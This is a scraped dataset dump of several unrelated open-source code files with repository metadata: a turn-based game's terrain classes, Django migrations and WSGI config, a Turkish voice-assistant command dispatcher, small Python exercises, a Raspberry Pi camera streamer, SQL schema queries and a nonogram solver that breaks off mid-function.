self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class City(Terrain):
def __init__(self, game, x, y, owner):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = City_sprite(game, x, y, owner)
self.name = "City"
self.defense = 3
self.type = BUILDING
self.building_type = LAND
self.hp = 20
self.x = x
self.y = y
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
self.owner = owner
if owner is not None:
self.owner.buildings.append(self)
def add_funds(self):
self.owner.funds += 1000
def new_owner(self, player):
self.owner.buildings.remove(self)
self.sprite.kill()
self.sprite = City_sprite(self.game, self.x, self.y, player)
self.owner = player
self.owner.buildings.append(self)
class Factory(Terrain):
def __init__(self, game, x, y, owner):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Factory_sprite(game, x, y, owner)
self.name = "factory"
self.defense = 3
self.type = BUILDING
self.building_type = LAND
self.hp = 20
self.x = x
self.y = y
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
self.owner = owner
if owner is not None:
self.owner.buildings.append(self)
def add_funds(self):
self.owner.funds += 1000
def new_owner(self, player):
self.owner.buildings.remove(self)
self.sprite.kill()
self.sprite = City_sprite(self.game, self.x, self.y, player)
self.owner = player
self.owner.buildings.append(self)
class HQ(Terrain):
def __init__(self, game, x, y, owner):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Hq_sprite(game, x, y, owner)
self.name = "HQ"
self.defense = 4
self.type = BUILDING
self.building_type = LAND
self.hp = 20
self.x = x
self.y = y
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
self.owner = owner
if owner is not None:
self.owner.buildings.append(self)
def add_funds(self):
self.owner.funds += 1000
def new_owner(self, player):
print("You win the game!")
self.game.preview_text.text = ""
self.game.preview_text.text = "You win the game!!!"
self.game.draw()
exit()
| [
"noreply@github.com"
] | Fenrir127.noreply@github.com |
f28ba09e107306b65b13e2ac8683488c3fbf89a0 | 13152e95d8f0fa7c9b9bcb0be368b869b8c34b0f | /apps/diary/migrations/0003_auto_20180929_1857.py | 869839b1cbe31778bbda7881611ab44efa2b9530 | [] | no_license | Emiyaaaaa/personalweb | 75872239a963ce59665735a2c9bfff46dc2a671a | a4d47dc9a3a5fdf1c3d24d587a177e19b878b661 | refs/heads/master | 2021-06-03T09:22:31.201318 | 2020-09-02T07:16:49 | 2020-09-02T07:16:49 | 148,086,883 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 386 | py | # Generated by Django 2.1.1 on 2018-09-29 18:57
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('diary', '0002_diary_diarycomment'),
]
operations = [
migrations.AlterModelOptions(
name='diarycomment',
options={'verbose_name': '评论', 'verbose_name_plural': '评论'},
),
]
| [
"2914034404@qq.com"
] | 2914034404@qq.com |
f50f22f4257ef2bd4b135c4c4b543869c019f8b8 | 4eeb40dcc265caf4a2b84bc90a28d481930d6a8a | /cssproject/cssproject/wsgi.py | e87cec6d202682e65310c1cd76e7ac0245d43209 | [] | no_license | mprasu/Sample-Projects | eb7fc46e81b09d7c97c238047e3c93b6fff3fb8d | 7363baf630900ab2babb4af2afe77911d8a548b2 | refs/heads/master | 2020-04-16T06:43:16.345750 | 2019-01-12T07:07:34 | 2019-01-12T07:07:34 | 165,358,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for cssproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cssproject.settings")
application = get_wsgi_application()
| [
"muppuriprasanna5@gmail.com"
] | muppuriprasanna5@gmail.com |
45278734804df48db80172a886fbefcd6bf1b64f | dd1462c6dd2aacf13113834854be92b119315722 | /commands.py | ff1f0b7e79f927c5cdb5fd2a885a25572c1fbd0c | [] | no_license | voiceassistant-SEDA/Voice-Asistant | 8d9298f2b5e41c0f14c9d8f31de58df1deca0a93 | 7995875fccde96f4745f4c87fc370d81ac7f61ef | refs/heads/main | 2023-05-05T11:45:07.850369 | 2021-05-21T15:45:33 | 2021-05-21T15:45:33 | 369,581,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,342 | py | import os
import json
import function
import backend
import random
from fuzzywuzzy import process
import Levenshtein as lev
class Commands :
def __init__ (self,function,module,neuralNetwork) :
self.function = function
self.module = module
self.neuralNetwork = neuralNetwork
with open ("./Data/commands.json","r",encoding='utf8' ) as file:
self.commands=json.load (file)
def Run (self,data) :
data=data.lower()
for key in self.commands.keys():
for command in self.commands[key]:
if data in self.commands[key][command]:
return self.Execute( command,key )
#search komutları
words=data.split(" ")
for command in self.commands["search"].keys():
for word in words:
if word in self.commands["search"][command]:
words.remove(word)
search=""
for i in words:
search+=i+" "
return self.Execute(command,"search",search)
"""
#Yapay sinir ağı analizi
i = neuralNetwork.Analyse(data)
if i == 1:
data=data.lower()
ratio = 0
command = ""
key=""
for k in self.commands.keys():
for com in self.commands[k]:
highest = process.extractOne(data,com)
if ratio<highest[1]:
ratio=highest[1]
command=highest[0]
key=k
return self.Execute(command,key)
elif i == 2:
self.Execute2()
else:
data=data.lower()
ratio = 0
command = ""
key=""
for k in self.commands.keys():
for com in self.commands[k]:
highest = process.extractOne(data,com)
if ratio<highest[1]:
ratio=highest[1]
command=highest[0]
key=k
return self.Execute(command,key)
"""
self.module.speak ("Ne dediğini anlayamadım.")
return 1
def Execute (self,command,commandType,search="") :
#conversation
if commandType=="sohbetCumleleri":
if command=="nasilsin":
self.module.speak(random.choice(self.commands["nasilsindonusCumleleri"]["donus"]))
elif command=="tesekkur":
self.module.speak("Rica ederim {}".format(self.function.GetInfo("name")))
elif command=="iyiyim":
self.module.speak("Hep iyi ol :)")
#user update
elif commandType=="update" :
if command=="isimguncelle" :
if self.function.UpdateInfo ("name"):
self.module.speak ("İsmini {} olarak güncelledim".format( self.function.GetInfo ("name")))
elif command=="yasguncelle" :
if self.function.UpdateInfo( "age"):
self.module.speak("Yaşını {} olarak güncelledim.".format(self.function.GetInfo("age")))
elif command=="sehirguncelle":
if self.function.UpdateInfo("hometown","city"):
self.module.speak("Yaşadığın şehri {} olarak güncelledim.".format(self.function.GetInfo("hometown","city")))
elif command=="dogumtarihiguncelle":
if self.function.UpdateInfo("birthdate"):
self.module.speak("Doğum tarihini {} olarak güncelledim.".format(self.function.GetInfo("birthdate")))
elif command=="okulguncelle":
if self.function.UpdateInfo("university","faculty","department"):
self.module.speak("Okul bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("university","faculty","department")))
elif command=="meslekguncelle":
if self.function.UpdateInfo("job"):
self.module.speak( "Meslek bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("job")))
#user info
elif commandType=="getInfo" :
if command=="meslekgetir" :
self.module.speak(self.function.GetInfo ("job"))
if command=="yasgetir":
self.module.speak(self.function.GetInfo("age"))
if command=="sehirgetir":
self.module.speak(self.function.GetInfo("hometown","city"))
if command=="dogumtarihigetir":
self.module.speak(self.function.GetInfo("birthdate"))
if command=="okulbilgisigetir":
self.module.speak(self.function.GetInfo("school","university"))
self.module.speak(self.function.GetInfo("school","faculty"))
self.module.speak(self.function.GetInfo("school","department"))
#asistan info
elif commandType=="asistanInfo" :
if command=="kendinitanit" :
self.module.speak ("Merhabalar benim adım Seda. Ben bir sesli asistanım" )
elif command=="isimsoru" :
self.module.speak ("Benim adım Seda" )
#time functions
elif commandType=="timeFunctions" :
if command=="saatSoru" :
self.module.speak ("Şu an saat "+self.function.Clock() )
elif command=="tarihSoru" :
self.module.speak ("Bugün: "+self.function.Date())
#quick search
elif commandType=="quickSearch":
if command=="havaDurumuSoru":
self.module.speak("İşte bugünkü hava durumu:")
self.function.Search("Hava durumu")
#search
elif commandType=="search":
if command=="webAra":
self.module.speak("İşte senin için bulduklarım: ")
self.function.Search(search)
if command=="musicAra":
self.function.YoutubePlay(search)
#close
elif commandType=="close" :
if command=="kapat" :
self.module.speak ("Görüşmek üzere {}".format (self.function.GetInfo ("name")))
return 0
else:
self.module.speak ("Bir şeyler ters gitti" )
return 0
return 1 | [
"73945726+sirmakalender@users.noreply.github.com"
] | 73945726+sirmakalender@users.noreply.github.com |
d8ded25ef10e93c72605b89d85452c69e80636d6 | 9fdc3443090052d31089f8181cfce4d62ca97616 | /exception_handling_advanced_example61.py | aaca7a2d555cedf68e1fb60cee48b451d3e7b846 | [] | no_license | ahmedyoko/python-course-Elzero | 9d82b08e81d597292ee85c0d517d8116d0be0905 | bc11dca9b7ccbccb7c66d6a5b34ded0e6dedc9f8 | refs/heads/master | 2023-07-25T19:44:22.073679 | 2021-09-07T19:35:30 | 2021-09-07T19:35:30 | 399,866,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,097 | py | #...........................................
# exception_handling_advanced_examples
# try | except | else | finally
#....................................................
the_file = None
the_tries = 5
while the_tries > 0 :
print(f'{the_tries} tries left')
the_tries -= 1
else :
print('All tries are done')
print('*'*50)
the_file = None
the_tries = 5
while the_tries > 0 :
try : # try to open the file
print('enter the file name with the absolute path to open')
print(f'you have {the_tries} tries left')
print('Example => D:\python\file\yourfile.extension')
file_name_and_path = input('file name => : ').strip().lower()
the_file = open(file_name_and_path,'r')
print(the_file.read())
break
except FileNotFoundError:
print('the file not found please be sure the name is valid')
the_tries -= 1
except :
print('error happens')
finally :
if the_file is not None :
the_file.close()
print('the file is closed')
else :
print('All tries are done') | [
"aos438479@gmail.com"
] | aos438479@gmail.com |
11e7feb68dc8e7c7d92ddb397418250a2ca1228e | eb3cd8723752e34e46728d02d5f95f3e8e7a864d | /Django/myvenv/bin/chardetect-3.8 | d426c822917bb3d16d6de63f05b1eeafdc98791e | [] | no_license | AbhisarSaraswat/Projects | bdf5b455e6f2480401d646c1115be1a79de6b83d | 59fe23b803a3d7617b26ecec4259c418704d4cc7 | refs/heads/master | 2021-11-17T09:51:32.410418 | 2021-05-21T10:42:31 | 2021-05-21T10:42:31 | 168,728,445 | 0 | 0 | null | 2021-09-22T19:50:09 | 2019-02-01T16:40:42 | Python | UTF-8 | Python | false | false | 245 | 8 | #!/home/lucifer/Projects/myvenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"abhisarsaraswat@gmail.com"
] | abhisarsaraswat@gmail.com |
de075cc155d45012e62fee4fd10dbfd477ea0b69 | 5e0ef0a177306aa205493259cc274be7bb72b9eb | /login_and_registration/apps/log_regs_app/urls.py | 0167a0fd2c5be22b28dbfc5dee64462961a66956 | [] | no_license | reinib/PythonDjangoCD | 07654f45e6e339cb3091d66d7bfccb04a46111d1 | 5fef1906a90c997c13a17ef9aec0df30733d5ea8 | refs/heads/master | 2020-04-11T10:31:42.034181 | 2018-12-14T01:55:06 | 2018-12-14T01:55:06 | 161,717,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^validate_register$', views.validate_register),
url(r'^users/(?P<id>\d+)$', views.success),
url(r'^validate_login$', views.validate_login),
]
| [
"brent.reininger89@gmail.com"
] | brent.reininger89@gmail.com |
fd5b3d07a2a0a980e3a2da89214375a9c7a9d6ec | 1cfb61bb6cee6c8978ad50956d5af36edeb7ee6f | /menu/migrations/0007_auto_20161007_1750.py | 21534b135687d6b66964406bad09b712e06dffb0 | [] | no_license | greenmails2001/analytics | 221a2264e8a9db63df9ab57fa6393b1e0df62052 | cfde53d5402f302e904b96991d67a0c9a210a6c9 | refs/heads/master | 2021-01-11T05:43:43.666368 | 2016-10-31T14:45:11 | 2016-10-31T14:45:11 | 71,340,991 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,978 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('menu', '0006_auto_20161005_1327'),
]
operations = [
migrations.RenameField(
model_name='file',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='file',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='image',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='image',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='menudetail',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='menudetail',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='menuheader',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='menuheader',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='text',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='text',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='video',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='video',
old_name='updated',
new_name='updateddate',
),
]
| [
"greenmails2001@gmail.com"
] | greenmails2001@gmail.com |
c2ae54754ea651fb4d0e578fe907000e3bf0da28 | f1efbd5d8039e95809ad8d313bd1a9c96d51cbf9 | /sql_queries.py | 0bbbb3f48c5d256f37eb83270cec170d4660c9b2 | [] | no_license | WittmannF/data-engineering-projects-postgres | 48a7c889133c6d17af825ef4ce1d59e5b6b41e50 | 5b3200c8977d6162d56f40247e8390d028c0ad8c | refs/heads/main | 2023-02-15T18:11:39.796621 | 2021-01-05T21:44:14 | 2021-01-05T21:44:14 | 326,008,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,191 | py | # DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
user_table_drop = "DROP TABLE IF EXISTS users;"
song_table_drop = "DROP TABLE IF EXISTS songs;"
artist_table_drop = "DROP TABLE IF EXISTS artists;"
time_table_drop = "DROP TABLE IF EXISTS time;"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE songplays (
songplay_id SERIAL PRIMARY KEY,
start_time BIGINT NOT NULL,
user_id INT,
level VARCHAR,
song_id VARCHAR,
artist_id VARCHAR,
session_id INT,
location VARCHAR,
user_agent VARCHAR
);
""")
user_table_create = ("""
CREATE TABLE users (
user_id INT PRIMARY KEY,
first_name VARCHAR,
last_name VARCHAR,
gender VARCHAR,
level VARCHAR
);
""")
song_table_create = ("""
CREATE TABLE songs (
song_id VARCHAR PRIMARY KEY,
title VARCHAR,
artist_id VARCHAR NOT NULL,
year INT,
duration FLOAT
);
""")
artist_table_create = ("""
CREATE TABLE artists (
artist_id VARCHAR PRIMARY KEY,
name VARCHAR,
location VARCHAR,
latitude FLOAT,
longitude FLOAT
);
""")
time_table_create = ("""
CREATE TABLE time (
start_time BIGINT PRIMARY KEY,
hour INT,
day INT,
week INT,
month INT,
year INT,
weekday INT
);
""")
# INSERT RECORDS
songplay_table_insert = ("""
INSERT INTO songplays (
start_time,
user_id,
level,
song_id,
artist_id,
session_id,
location,
user_agent)
VALUES ( %s, %s, %s, %s, %s, %s, %s, %s);
""")
user_table_insert = ("""
INSERT INTO users (
user_id,
first_name,
last_name,
gender,
level)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (user_id)
DO UPDATE SET level = EXCLUDED.level;
""")
song_table_insert = ("""
INSERT INTO songs (
song_id,
title,
artist_id,
year,
duration)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (song_id)
DO NOTHING;
""")
artist_table_insert = ("""
INSERT INTO artists (
artist_id,
name,
location,
latitude,
longitude)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (artist_id)
DO NOTHING;
""")
time_table_insert = ("""
INSERT INTO time (
start_time,
hour,
day,
week,
month,
year,
weekday)
VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (start_time)
DO NOTHING;
""")
# FIND SONGS
song_select = ("""
SELECT songs.song_id, artists.artist_id
FROM songs INNER JOIN artists ON (songs.artist_id = artists.artist_id)
WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s
;
""")
# QUERY LISTS
create_table_queries = [
songplay_table_create,
user_table_create,
song_table_create,
artist_table_create,
time_table_create
]
drop_table_queries = [
songplay_table_drop,
user_table_drop,
song_table_drop,
artist_table_drop,
time_table_drop
] | [
"fernando.wittmann@gmail.com"
] | fernando.wittmann@gmail.com |
58cbe82bcc8bd6afeed52101fca9d77621105eef | 4be56098894a95da5964622fc4102b69e4530ab6 | /题库/1399.页面推荐.py | 5a140da6d4ab9fa5c70e7d7e978fdf740737d005 | [] | no_license | ACENDER/LeetCode | 7c7c7ecc8d0cc52215272f47ec34638637fae7ac | 3383b09ab1246651b1d7b56ab426a456f56a4ece | refs/heads/master | 2023-03-13T19:19:07.084141 | 2021-03-15T09:29:21 | 2021-03-15T09:29:21 | 299,332,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | # !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : 1399.页面推荐.py
| [
"1641429327@qq.com"
] | 1641429327@qq.com |
4c87054e4f6b517be8dae9e5d95da62f3c6a37aa | 47884bb53ffb293ccfff5e4c808915e00f6cc0d3 | /archive/timeDelta.py | d80a440ffeeba2400e92fbacc59bb5a9a95990b1 | [] | no_license | andyschultz/Scripts | f0b75b537b825fa7ff89efec63299e2a697790f7 | 7d3b57e292ce8f48ac40553a51c052bbc1c975f8 | refs/heads/master | 2021-01-13T01:29:40.853048 | 2015-04-30T17:17:08 | 2015-04-30T17:17:08 | 26,029,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | #!/usr/local/bin/python3
import pandas as pd, numpy as np,sys
file = sys.argv[1]
def buildDelta(file):
df = pd.read_csv(file,sep="\t",index_col=False,skiprows=1)
df.iloc[:,0]= pd.to_datetime(df.iloc[:,0])
df.insert(1,"Cumulative Time","NaN")
df["Cumulative Time"] = (df.iloc[:,0]-df.iloc[:,0].shift()).fillna(0)
df["Cumulative Time"] = df["Cumulative Time"].cumsum(axis=0)
df["Cumulative Time"] = df["Cumulative Time"] / np.timedelta64(1,'h')
df.to_csv(file.rstrip(".txt")+"-delta.txt",index=False,sep="\t")
buildDelta(file) | [
"andy.schultz1@gmail.com"
] | andy.schultz1@gmail.com |
2f9db9f890c9233e5af1669088468a7683d1af35 | 0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664 | /awssam/fullfeblog/blog/migrations/0002_auto_20201208_1414.py | b61387acb7dcbe792fb0d7d8887e97d528f46789 | [] | no_license | mrpal39/ev_code | 6c56b1a4412503604260b3346a04ef53a2ba8bf2 | ffa0cf482fa8604b2121957b7b1d68ba63b89522 | refs/heads/master | 2023-03-24T03:43:56.778039 | 2021-03-08T17:48:39 | 2021-03-08T17:48:39 | 345,743,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,023 | py | # Generated by Django 3.1.4 on 2020-12-08 14:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-publish',)},
),
migrations.RenameField(
model_name='post',
old_name='content',
new_name='body',
),
migrations.RenameField(
model_name='post',
old_name='date_posted',
new_name='publish',
),
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default=django.utils.timezone.now, max_length=250, unique_for_date='publish'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=10),
),
migrations.AddField(
model_name='post',
name='updated',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(max_length=250),
),
]
| [
"rp9545416@gmail.com"
] | rp9545416@gmail.com |
840f45903a811282a9e7105496d723fef512547a | 743778017a0e775832e45fc05d9a056604f608ad | /km71/Guro_Dmytro/4/Task7.py | e6d342044e39db64385b0d1b3e66988e2430196c | [] | no_license | Kalinia/amis_python71 | fed5ff37a5909c090a53962daa689141498755b1 | 0123af48b1eaa6d752409b1b643f548c6b0e4ab8 | refs/heads/master | 2021-05-07T17:24:21.974699 | 2017-12-21T22:13:00 | 2017-12-21T22:13:00 | 108,726,150 | 0 | 0 | null | 2017-10-29T10:54:14 | 2017-10-29T10:54:14 | null | UTF-8 | Python | false | false | 590 | py | while True:
try:
x1 = int(input())
break
except:
print("Please enter number")
while True:
try:
y1=int(input())
break
except:
print("Please enter number")
while True:
try:
x2=int(input())
break
except:
print("Please enter number")
while True:
try:
y2=int(input())
break
except:
print("Please enter number")
if (x1+x2)%2==0 and (y1+y2)%2==0:
print("YES")
elif (x1+x2)%2!=0 and (y1+y2)%2!=0:
print("YES")
else:
print("NO")
| [
"noreply@github.com"
] | Kalinia.noreply@github.com |
e886796a357ded12e7a87bd69fcd9177507e8a8b | 348d736636ddc3490df1b47fafbe26d10124148e | /camera_pi.py | d502e24cc78b9b0ae47ee12cd1dd097b5bc64041 | [] | no_license | HensonZl/hackrfpibot | 2636fbf19627913ddc754f5acc89d866612cb672 | 4eb730f5add931d0d26f2ec1177994dee5417012 | refs/heads/master | 2020-05-18T13:11:47.446115 | 2019-05-01T21:57:28 | 2019-05-01T21:57:28 | 184,431,429 | 16 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,986 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
# NOT MY SCRIPT this was used from https://www.hackster.io/ruchir1674/video-streaming-on-flask-server-using-rpi-ef3d75
# Look at the above link to get the documentation for the following script.
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (320, 240)
camera.hflip = True
camera.vflip = True
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None | [
"noreply@github.com"
] | HensonZl.noreply@github.com |
64cba2c2b0ca9bb48817b6596678847d35379587 | 2428f771974183f86dd76a5ab9621097bba85d4e | /solve.py | 28c74e44d34b35b2770e55b9d057a465143ad34e | [] | no_license | Oripy/nonogram-solver | 3bdcffd282e49b117a10e475b65734e6ae23fa09 | d81b79caac04f8666bc39cba2a8fe95e592ab9e3 | refs/heads/master | 2021-01-15T16:00:47.186485 | 2011-07-18T08:40:48 | 2011-07-18T08:40:48 | 3,313,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,922 | py | #!/usr/bin/env python
import sys
import string
import copy
import types
from data_diff import data_diff
def get_permutations(counts, length):
"""
>>> get_permutations([], 1)
[[False]]
>>> get_permutations([1], 1)
[[True]]
>>> get_permutations([2], 3)
[[True, True, False], [False, True, True]]
>>> get_permutations([2], 4)
[[True, True, False, False], [False, True, True, False], [False, False, True, True]]
>>> get_permutations([1, 1], 4)
[[True, False, True, False], [True, False, False, True], [False, True, False, True]]
>>> get_permutations([1, 2], 5)
[[True, False, True, True, False], [True, False, False, True, True], [False, True, False, True, True]]
>>> get_permutations([1, 1, 2], 7)
[[True, False, True, False, True, True, False], [True, False, True, False, False, True, True], [True, False, False, True, False, True, True], [False, True, False, True, False, True, True]]
"""
if len(counts) == 0:
row = []
for x in xrange(length):
row.append(False)
return [row]
permutations = []
for start in xrange(length - counts[0] + 1):
permutation = []
for x in xrange(start):
permutation.append(False)
for x in xrange(start, start + counts[0]):
permutation.append(True)
x = start + counts[0]
if x < length:
permutation.append(False)
x += 1
if x == length and len(counts) == 0:
permutations.append(permutation)
break
sub_start = x
sub_rows = get_permutations(counts[1:len(counts)], length - sub_start)
for sub_row in sub_rows:
sub_permutation = copy.deepcopy(permutation)
for x in xrange(sub_start, length):
sub_permutation.append(sub_row[x-sub_start])
permutations.append(sub_permutation)
return permutations
def solve_row(counts, row):
"""
>>> solve_row([], [None])
[False]
>>> solve_row([1], [None])
[True]
>>> solve_row([2], [False, None, None])
[False, True, True]
>>> solve_row([2], [True, None, None])
[True, True, False]
>>> solve_row([2], [None, None, None])
[None, True, None]
>>> solve_row([2], [None, False, None, None])
[False, False, True, True]
>>> solve_row([2], [None, False, None, None, None, None])
[False, False, None, None, None, None]
row already completed:
>>> solve_row([1], [None, True, None])
[False, True, False]
too far away to be able to complete
>>> solve_row([2], [None, True, None, None])
[None, True, None, False]
assume positions of all except one count
>>> solve_row([1, 2], [None, None, None, None, None])
[None, None, None, True, None]
>>> solve_row([1, 1, 1, 2], [None, None, None, None, None, None, None, None, None])
[None, None, None, None, None, None, None, True, None]
>>> solve_row([1, 7], [None, False, True, None, None, None, None, None, None, None])
[True, False, True, True, True, True, True, True, True, False]
doesn't fit on one size of False
>>> solve_row([1, 1], [None, False, None, None])
[True, False, None, None]
doesn't fit on one size of False
>>> solve_row([1, 2], [None, None, False, None, None, None])
[None, None, False, None, True, None]
already started on one side of False
>>> solve_row([4], [None, None, None, None, False, None, True, None, None, None])
[False, False, False, False, False, None, True, True, True, None]
"""
permutations = get_permutations(counts, len(row))
valid_permutations = []
for permutation in permutations:
valid = True
for x in xrange(len(row)):
if row[x] != None and row[x] != permutation[x]:
valid = False
if valid:
valid_permutations.append(permutation)
new_row = copy.deepcopy(valid_permutations[0])
for permutation in valid_permutations:
for x in xrange(len(row)):
if new_row[x] != permutation[x]:
new_row[x] = None
return new_row
def solve(row_counts, col_counts, grid):
width = len(grid[0])
height = len(grid)
changed = True
while changed:
changed = False
for x in xrange(width):
col = []
for y in xrange(height):
col.append(grid[y][x])
col = solve_row(col_counts[x], col)
for y in xrange(height):
if col[y] != None and grid[y][x] != col[y]:
changed = True
grid[y][x] = col[y]
for y in xrange(height):
row = copy.deepcopy(grid[y])
row = solve_row(row_counts[y], row)
for x in xrange(1):
if row[x] != None and grid[y][x] != row[x]:
changed = True
grid[y] = row
return grid
def check_solution(grid):
row_counts = []
col_counts = []
for y in xrange(len(grid)):
row_counts.append([0])
for x in xrange(len(grid[0])):
col_counts.append([0])
for y in xrange(len(grid)):
for x in xrange(len(grid[0])):
if grid[y][x] == True:
row_counts[y][-1] += 1
col_counts[x][-1] += 1
elif grid[y][x] == False:
if row_counts[y][-1] != 0:
row_counts[y].append(0)
if col_counts[x][-1] != 0:
col_counts[x].append(0)
for y in xrange(len(grid)):
if row_counts[y][-1] == 0:
row_counts[y].pop()
for x in xrange(len(grid[0])):
if col_counts[x][-1] == 0:
col_counts[x].pop()
return [row_counts, col_counts]
def solve_from_file(filename):
f = open(filename)
lines = f.readlines()
#convert into a list of lists and remove whitespace
grid = []
width = 0
for line in lines:
line = line.rstrip()
if line:
row = string.split(line, "\t")
width = max(width, len(row))
grid.append(row)
height = len(grid)
#convert into integers and normalize row width
y = 0
for row in grid:
new_row = []
for x in xrange(width):
try:
i = int(row[x])
except IndexError:
i = None
except ValueError:
if row[x] == 'T':
i = True
elif row[x] == 'F':
i = False
else:
i = None
new_row.append(i)
grid[y] = new_row
y += 1
#measure height and width of inner grid
x = width - 1
y = height - 1
while x >= 0:
if type(grid[y][x]) == types.IntType:
break
x -= 1
inner_width = width - x - 1
x = width - 1
y = height - 1
while y >= 0:
if type(grid[y][x]) == types.IntType:
break
y -= 1
inner_height = len(grid) - y - 1
print "board size: %dx%d" % (inner_width, inner_height)
#ensure inner grid is valid
for x in xrange(width - inner_width, width):
for y in xrange(height - inner_height, height):
if type(grid[y][x]) != types.NoneType and type(grid[y][x]) != types.BooleanType:
print 'invalid board'
exit()
#ensure upper left is empty
for x in xrange(width - inner_width):
for y in xrange(height - inner_height):
if grid[y][x] != None:
print 'invalid board'
exit()
counts_width = width - inner_width
counts_height = height - inner_height
#populate row counts
row_counts = []
for y in xrange(counts_height, height):
counts = []
for x in xrange(counts_width):
count = grid[y][x]
if count:
counts.append(count)
row_counts.append(counts)
